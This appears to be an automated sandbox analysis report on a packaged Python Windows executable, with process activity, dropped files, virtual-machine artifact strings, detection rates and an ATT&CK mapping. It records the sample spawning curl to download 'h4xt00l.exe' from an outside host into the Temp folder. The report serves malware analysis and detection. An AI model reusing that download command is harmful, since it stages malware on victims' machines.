Source: curl.exe, 00000002.00000003.1744460082.000001AFC635E000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000003.1744252579.000001AFC63BC000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000003.1744436719.000001AFC637B000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000003.1744193429.000001AFC63BC000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000002.1744803181.000001AFC6360000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000003.1744315682.000001AFC63BC000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000003.1744492924.000001AFC637B000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000003.1744564320.000001AFC637B000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000002.1744803181.000001AFC637C000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000003.1744365340.000001AFC637B000.00000004.00000020.00020000.00000000.sdmp, h4xt00l.exe.2.drString found in binary or memory: https://fonts.googleapis.com/css?family=Nunito:700
Source: aLsxeH29P2.exe, 00000001.00000002.2973425589.0000019FAF521000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
Source: aLsxeH29P2.exe, 00000001.00000002.2973738062.0000019FB0E10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
Source: aLsxeH29P2.exe, 00000001.00000002.2973425589.0000019FAF521000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
Source: aLsxeH29P2.exe, 00000001.00000002.2973425589.0000019FAF521000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
Source: aLsxeH29P2.exe, 00000001.00000002.2973425589.0000019FAF521000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
Source: curl.exe, 00000002.00000002.1744746751.000001AFC6340000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000003.1744436719.000001AFC637B000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000003.1744492924.000001AFC637B000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000003.1744564320.000001AFC637B000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000002.1744803181.000001AFC637C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://haxerr.eu.loclx.io/h4xt00l.exe
Source: curl.exe, 00000002.00000002.1744746751.000001AFC6349000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://haxerr.eu.loclx.io/h4xt00l.exe--outputC:
Source: curl.exe, 00000002.00000003.1744436719.000001AFC637B000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000003.1744492924.000001AFC637B000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000003.1744564320.000001AFC637B000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000002.1744803181.000001AFC637C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://haxerr.eu.loclx.io/h4xt00l.exe?
Source: curl.exe, 00000002.00000003.1744436719.000001AFC637B000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000003.1744492924.000001AFC637B000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000003.1744564320.000001AFC637B000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000002.1744803181.000001AFC637C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://haxerr.eu.loclx.io/h4xt00l.exeQ
Source: aLsxeH29P2.exe, 00000001.00000002.2974046958.0000019FB11F0000.00000004.00001000.00020000.00000000.sdmp, base_library.zip.0.drString found in binary or memory: https://peps.python.org/pep-0205/
Source: aLsxeH29P2.exe, 00000001.00000002.2975033574.00007FFDFB5F2000.00000002.00000001.01000000.00000004.sdmp, python312.dll.0.drString found in binary or memory: https://peps.python.org/pep-0263/
Source: libcrypto-3.dll.0.drString found in binary or memory: https://www.openssl.org/H
Source: aLsxeH29P2.exe, 00000001.00000002.2975354634.00007FFDFB768000.00000008.00000001.01000000.00000004.sdmp, python312.dll.0.drString found in binary or memory: https://www.python.org/psf/license/
Source: aLsxeH29P2.exe, 00000001.00000002.2975033574.00007FFDFB5F2000.00000002.00000001.01000000.00000004.sdmp, python312.dll.0.drString found in binary or memory: https://www.python.org/psf/license/)
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownHTTPS traffic detected: 167.99.38.229:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: C:\Users\user\Desktop\aLsxeH29P2.exeCode function: String function: 00007FF7F3DD2710 appears 104 times
Source: C:\Users\user\Desktop\aLsxeH29P2.exeCode function: String function: 00007FF7F3DD2910 appears 34 times
Source: unicodedata.pyd.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: aLsxeH29P2.exe, 00000000.00000003.1718939260.0000021C07580000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameselect.pyd. vs aLsxeH29P2.exe
Source: aLsxeH29P2.exe, 00000000.00000003.1714677193.0000021C07580000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs aLsxeH29P2.exe
Source: aLsxeH29P2.exe, 00000000.00000003.1714279446.0000021C0757F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs aLsxeH29P2.exe
Source: aLsxeH29P2.exe, 00000000.00000003.1714799794.0000021C07580000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs aLsxeH29P2.exe
Source: aLsxeH29P2.exe, 00000000.00000003.1714112999.0000021C0757E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs aLsxeH29P2.exe
Source: aLsxeH29P2.exe, 00000000.00000003.1714403552.0000021C07580000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_decimal.pyd. vs aLsxeH29P2.exe
Source: aLsxeH29P2.exe, 00000000.00000003.1719100028.0000021C07580000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs aLsxeH29P2.exe
Source: aLsxeH29P2.exe, 00000000.00000003.1714561302.0000021C07580000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs aLsxeH29P2.exe
Source: aLsxeH29P2.exeBinary or memory string: OriginalFilename vs aLsxeH29P2.exe
Source: aLsxeH29P2.exe, 00000001.00000002.2975586760.00007FFDFB891000.00000002.00000001.01000000.00000004.sdmpBinary or memory string: OriginalFilenamepython312.dll. vs aLsxeH29P2.exe
Source: aLsxeH29P2.exe, 00000001.00000002.2975683450.00007FFE126D9000.00000002.00000001.01000000.00000005.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs aLsxeH29P2.exe
Source: classification engine Classification label: mal60.winEXE@7/14@1/2
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7392:120:WilError_03
Source: C:\Users\user\Desktop\aLsxeH29P2.exe File created: C:\Users\user\AppData\Local\Temp\_MEI73522
Source: aLsxeH29P2.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\aLsxeH29P2.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: aLsxeH29P2.exe Virustotal: Detection: 50%
Source: aLsxeH29P2.exe ReversingLabs: Detection: 36%
Source: C:\Users\user\Desktop\aLsxeH29P2.exe File read: C:\Users\user\Desktop\aLsxeH29P2.exe
Source: unknown Process created: C:\Users\user\Desktop\aLsxeH29P2.exe "C:\Users\user\Desktop\aLsxeH29P2.exe"
Source: C:\Users\user\Desktop\aLsxeH29P2.exe Process created: C:\Users\user\Desktop\aLsxeH29P2.exe "C:\Users\user\Desktop\aLsxeH29P2.exe"
Source: C:\Users\user\Desktop\aLsxeH29P2.exe Process created: C:\Windows\System32\curl.exe curl https://haxerr.eu.loclx.io/h4xt00l.exe --output C:\Users\user\AppData\Local\Temp\h4xt00l.exe
Source: C:\Windows\System32\curl.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\aLsxeH29P2.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\aLsxeH29P2.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\aLsxeH29P2.exe Section loaded: vcruntime140.dll
Source: C:\Users\user\Desktop\aLsxeH29P2.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\aLsxeH29P2.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\aLsxeH29P2.exe Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\aLsxeH29P2.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\aLsxeH29P2.exe Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\aLsxeH29P2.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\aLsxeH29P2.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\aLsxeH29P2.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\aLsxeH29P2.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\aLsxeH29P2.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\aLsxeH29P2.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\aLsxeH29P2.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\curl.exe Section loaded: secur32.dll
Source: C:\Windows\System32\curl.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\curl.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\curl.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\curl.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\curl.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\curl.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\curl.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\curl.exe Section loaded: schannel.dll
Source: C:\Windows\System32\curl.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\curl.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\curl.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\curl.exe Section loaded: ncryptsslp.dll
Source: aLsxeH29P2.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: aLsxeH29P2.exeStatic file information: File size 7178619 > 1048576
Source: aLsxeH29P2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: aLsxeH29P2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: aLsxeH29P2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: aLsxeH29P2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: aLsxeH29P2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: aLsxeH29P2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: aLsxeH29P2.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: aLsxeH29P2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: aLsxeH29P2.exe, 00000000.00000003.1718939260.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr
Source: Binary string: D:\a\1\b\bin\amd64\python312.pdb source: aLsxeH29P2.exe, 00000001.00000002.2975033574.00007FFDFB5F2000.00000002.00000001.01000000.00000004.sdmp, python312.dll.0.dr
Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: aLsxeH29P2.exe, 00000000.00000003.1719100028.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, unicodedata.pyd.0.dr
Source: Binary string: D:\a\1\b\libcrypto-3.pdb| source: libcrypto-3.dll.0.dr
Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: aLsxeH29P2.exe, 00000000.00000003.1714561302.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, _hashlib.pyd.0.dr
Source: Binary string: D:\a\1\b\bin\amd64\_decimal.pdb$$ source: _decimal.pyd.0.dr
Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: aLsxeH29P2.exe, 00000000.00000003.1714677193.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, _lzma.pyd.0.dr
Source: Binary string: D:\a\1\b\bin\amd64\_decimal.pdb source: _decimal.pyd.0.dr
Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: aLsxeH29P2.exe, 00000000.00000003.1714677193.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, _lzma.pyd.0.dr
Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: aLsxeH29P2.exe, 00000000.00000003.1714279446.0000021C0757F000.00000004.00000020.00020000.00000000.sdmp, _bz2.pyd.0.dr
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: aLsxeH29P2.exe, 00000000.00000003.1714112999.0000021C0757E000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000001.00000002.2975654013.00007FFE126D3000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: libcrypto-3.dll.0.dr
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: aLsxeH29P2.exe, 00000000.00000003.1714112999.0000021C0757E000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000001.00000002.2975654013.00007FFE126D3000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
Source: Binary string: D:\a\1\b\libcrypto-3.pdb source: libcrypto-3.dll.0.dr
Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: aLsxeH29P2.exe, 00000000.00000003.1714799794.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, _socket.pyd.0.dr
Source: aLsxeH29P2.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: aLsxeH29P2.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: aLsxeH29P2.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: aLsxeH29P2.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: aLsxeH29P2.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: VCRUNTIME140.dll.0.drStatic PE information: section name: fothk
Source: VCRUNTIME140.dll.0.drStatic PE information: section name: _RDATA
Source: libcrypto-3.dll.0.drStatic PE information: section name: .00cfg
Source: python312.dll.0.drStatic PE information: section name: PyRuntim
Source: C:\Users\user\Desktop\aLsxeH29P2.exe File created: C:\Users\user\AppData\Local\Temp\_MEI73522\_lzma.pyd
Source: C:\Users\user\Desktop\aLsxeH29P2.exe File created: C:\Users\user\AppData\Local\Temp\_MEI73522\_bz2.pyd
Source: C:\Users\user\Desktop\aLsxeH29P2.exe File created: C:\Users\user\AppData\Local\Temp\_MEI73522\python312.dll
Source: C:\Users\user\Desktop\aLsxeH29P2.exe File created: C:\Users\user\AppData\Local\Temp\_MEI73522\select.pyd
Source: C:\Users\user\Desktop\aLsxeH29P2.exe File created: C:\Users\user\AppData\Local\Temp\_MEI73522\libcrypto-3.dll
Source: C:\Users\user\Desktop\aLsxeH29P2.exe File created: C:\Users\user\AppData\Local\Temp\_MEI73522\_hashlib.pyd
Source: C:\Users\user\Desktop\aLsxeH29P2.exe File created: C:\Users\user\AppData\Local\Temp\_MEI73522\_socket.pyd
Source: C:\Users\user\Desktop\aLsxeH29P2.exe File created: C:\Users\user\AppData\Local\Temp\_MEI73522\VCRUNTIME140.dll
Source: C:\Users\user\Desktop\aLsxeH29P2.exe File created: C:\Users\user\AppData\Local\Temp\_MEI73522\unicodedata.pyd
Source: C:\Users\user\Desktop\aLsxeH29P2.exe File created: C:\Users\user\AppData\Local\Temp\_MEI73522\_decimal.pyd
Source: C:\Users\user\Desktop\aLsxeH29P2.exeCode function: 0_2_00007FF7F3DD5830 GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,0_2_00007FF7F3DD5830
Source: C:\Users\user\Desktop\aLsxeH29P2.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73522\_lzma.pyd
Source: C:\Users\user\Desktop\aLsxeH29P2.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73522\_bz2.pyd
Source: C:\Users\user\Desktop\aLsxeH29P2.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73522\python312.dll
Source: C:\Users\user\Desktop\aLsxeH29P2.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73522\select.pyd
Source: C:\Users\user\Desktop\aLsxeH29P2.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73522\libcrypto-3.dll
Source: C:\Users\user\Desktop\aLsxeH29P2.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73522\_hashlib.pyd
Source: C:\Users\user\Desktop\aLsxeH29P2.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73522\_socket.pyd
Source: C:\Users\user\Desktop\aLsxeH29P2.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73522\_decimal.pyd
Source: C:\Users\user\Desktop\aLsxeH29P2.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73522\unicodedata.pyd
Source: C:\Users\user\Desktop\aLsxeH29P2.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-17226
Source: C:\Users\user\Desktop\aLsxeH29P2.exeAPI coverage: 6.0 %
Source: C:\Users\user\Desktop\aLsxeH29P2.exeCode function: 0_2_00007FF7F3DD9280 FindFirstFileExW,FindClose,0_2_00007FF7F3DD9280
Source: C:\Users\user\Desktop\aLsxeH29P2.exeCode function: 0_2_00007FF7F3DD83C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00007FF7F3DD83C0
Source: C:\Users\user\Desktop\aLsxeH29P2.exeCode function: 0_2_00007FF7F3DF1874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF7F3DF1874
Source: C:\Users\user\Desktop\aLsxeH29P2.exeCode function: 1_2_00007FF7F3DD9280 FindFirstFileExW,FindClose,1_2_00007FF7F3DD9280
Source: C:\Users\user\Desktop\aLsxeH29P2.exeCode function: 1_2_00007FF7F3DD83C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,1_2_00007FF7F3DD83C0
Source: C:\Users\user\Desktop\aLsxeH29P2.exeCode function: 1_2_00007FF7F3DF1874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,1_2_00007FF7F3DF1874
Source: Amcache.hve.1.drBinary or memory string: VMware
Source: Amcache.hve.1.drBinary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.1.drBinary or memory string: vmci.syshbin
Source: Amcache.hve.1.drBinary or memory string: VMware, Inc.
Source: Amcache.hve.1.drBinary or memory string: VMware20,1hbin@
Source: Amcache.hve.1.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.1.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.1.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.1.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.1.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.1.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.1.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: curl.exe, 00000002.00000003.1744515341.000001AFC6355000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll}}
Source: Amcache.hve.1.dr Binary or memory string: vmci.sys
Source: Amcache.hve.1.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.1.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.1.dr Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.1.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.1.dr Binary or memory string: VMware20,1
Source: Amcache.hve.1.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.1.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.1.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.1.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.1.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.1.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.1.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.1.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.1.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.1.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.1.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\Desktop\aLsxeH29P2.exe Code function: 0_2_00007FF7F3DDD12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7F3DDD12C
Source: C:\Users\user\Desktop\aLsxeH29P2.exe Code function: 0_2_00007FF7F3DF3480 GetProcessHeap,0_2_00007FF7F3DF3480
Source: C:\Users\user\Desktop\aLsxeH29P2.exe Code function: 0_2_00007FF7F3DDD30C SetUnhandledExceptionFilter,0_2_00007FF7F3DDD30C
Source: C:\Users\user\Desktop\aLsxeH29P2.exe Code function: 0_2_00007FF7F3DDC8A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF7F3DDC8A0
Source: C:\Users\user\Desktop\aLsxeH29P2.exe Code function: 0_2_00007FF7F3DEA614 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7F3DEA614
Source: C:\Users\user\Desktop\aLsxeH29P2.exe Code function: 1_2_00007FF7F3DDD30C SetUnhandledExceptionFilter,1_2_00007FF7F3DDD30C
Source: C:\Users\user\Desktop\aLsxeH29P2.exe Code function: 1_2_00007FF7F3DDD12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FF7F3DDD12C
Source: C:\Users\user\Desktop\aLsxeH29P2.exe Code function: 1_2_00007FF7F3DDC8A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00007FF7F3DDC8A0
Source: C:\Users\user\Desktop\aLsxeH29P2.exe Code function: 1_2_00007FF7F3DEA614 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FF7F3DEA614
Source: C:\Users\user\Desktop\aLsxeH29P2.exe Code function: 1_2_00007FFE126D0AA8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00007FFE126D0AA8
Source: C:\Users\user\Desktop\aLsxeH29P2.exe Process created: C:\Users\user\Desktop\aLsxeH29P2.exe "C:\Users\user\Desktop\aLsxeH29P2.exe"
Source: C:\Users\user\Desktop\aLsxeH29P2.exe Code function: 0_2_00007FF7F3DF9570 cpuid 0_2_00007FF7F3DF9570
Source: C:\Users\user\Desktop\aLsxeH29P2.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73522\base_library.zip VolumeInformation
Source: C:\Users\user\Desktop\aLsxeH29P2.exe Queries volume information: C:\Users\user\Desktop\aLsxeH29P2.exe VolumeInformation
Source: C:\Users\user\Desktop\aLsxeH29P2.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73522 VolumeInformation
Source: C:\Users\user\Desktop\aLsxeH29P2.exe Code function: 0_2_00007FF7F3DDD010 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF7F3DDD010
Source: C:\Users\user\Desktop\aLsxeH29P2.exe Code function: 0_2_00007FF7F3DF5C00 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,0_2_00007FF7F3DF5C00
Source: Amcache.hve.1.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.1.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.1.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.1.dr Binary or memory string: MsMpEng.exe
Reconnaissance: Gather Victim Identity Information | Credentials | Email Addresses | Employee Names
Resource Development: Acquire Infrastructure | Domains | DNS Server | Virtual Private Server
Initial Access: Valid Accounts | Default Accounts | Domain Accounts | Local Accounts
Execution: 1 Native API | Scheduled Task/Job | At | Cron
Persistence: 1 DLL Side-Loading | Boot or Logon Initialization Scripts | Logon Script (Windows) | Login Hook
Privilege Escalation: 11 Process Injection | 1 DLL Side-Loading | Logon Script (Windows) | Login Hook
Defense Evasion: 11 Process Injection | 1 Deobfuscate/Decode Files or Information | 1 Obfuscated Files or Information | 1 DLL Side-Loading
Credential Access: OS Credential Dumping | LSASS Memory | Security Account Manager | NTDS
Discovery: 2 System Time Discovery | 31 Security Software Discovery | 1 File and Directory Discovery | 22 System Information Discovery
Lateral Movement: Remote Services | Remote Desktop Protocol | SMB/Windows Admin Shares | Distributed Component Object Model
Collection: 1 Archive Collected Data | Data from Removable Media | Data from Network Shared Drive | Input Capture
